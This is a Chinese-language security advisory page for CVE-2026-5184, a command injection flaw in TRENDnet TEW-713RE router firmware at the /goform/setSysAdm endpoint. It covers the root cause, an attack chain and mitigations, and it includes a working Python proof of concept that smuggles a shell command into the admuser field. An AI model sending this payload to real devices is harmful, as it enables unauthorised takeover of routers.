IPBUF安全漏洞报告
English
CVE-2026-5184 CVSS 6.3 中危

CVE-2026-5184 TRENDnet TEW-713RE命令注入漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5184
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
TRENDnet TEW-713RE

相关标签

命令注入RCETRENDnetIoT路由器

漏洞概述

TRENDnet TEW-713RE固件版本1.02及之前版本存在命令注入漏洞。该漏洞位于/goform/setSysAdm接口中,由于对admuser参数缺乏严格的过滤,攻击者可构造恶意载荷注入系统命令。该攻击可远程发起,无需用户交互且仅需低权限,目前利用代码已公开。

技术细节

该漏洞的根本原因在于TRENDnet TEW-713RE路由器在处理/goform/setSysAdm请求时,未能正确净化admuser参数。当攻击者向该端点发送POST请求时,后端脚本直接将admuser的值拼接到系统命令中执行。由于缺乏对特殊字符(如;、|、&等)的转义,攻击者可以注入并执行任意操作系统命令。考虑到路由器Web服务通常运行在高权限下,成功利用此漏洞可导致设备被完全接管,造成机密性、完整性和可用性的全面破坏。

攻击链分析

STEP 1
侦察
攻击者识别出目标设备为TRENDnet TEW-713RE,并确认其固件版本在1.02及以下。
STEP 2
漏洞利用
攻击者向/goform/setSysAdm端点发送特制的HTTP POST请求,在admuser参数中注入Shell元字符和恶意命令。
STEP 3
命令执行
后端系统将恶意参数拼接并执行,导致攻击者注入的命令在设备操作系统上运行。
STEP 4
建立控制
攻击者利用执行的命令获取设备Shell权限,进一步植入后门或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target = "http://<TARGET_IP>/goform/setSysAdm" # Malicious payload to demonstrate command injection # Example: Creating a file or executing a reverse shell payload = "admin; touch /tmp/poc_success" # Construct the POST data data = { "admuser": payload, "admpass": "password" } try: # Send the exploit request response = requests.post(target, data=data) if response.status_code == 200: print("[+] Payload sent successfully.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

TRENDnet TEW-713RE <= 1.02

防御指南

临时缓解措施
如果无法立即升级固件,建议将路由器管理面板的访问权限限制在受信任的本地IP地址范围内,并禁用远程Web管理功能。同时,应密切监控网络流量中是否存在针对/goform/setSysAdm的异常请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表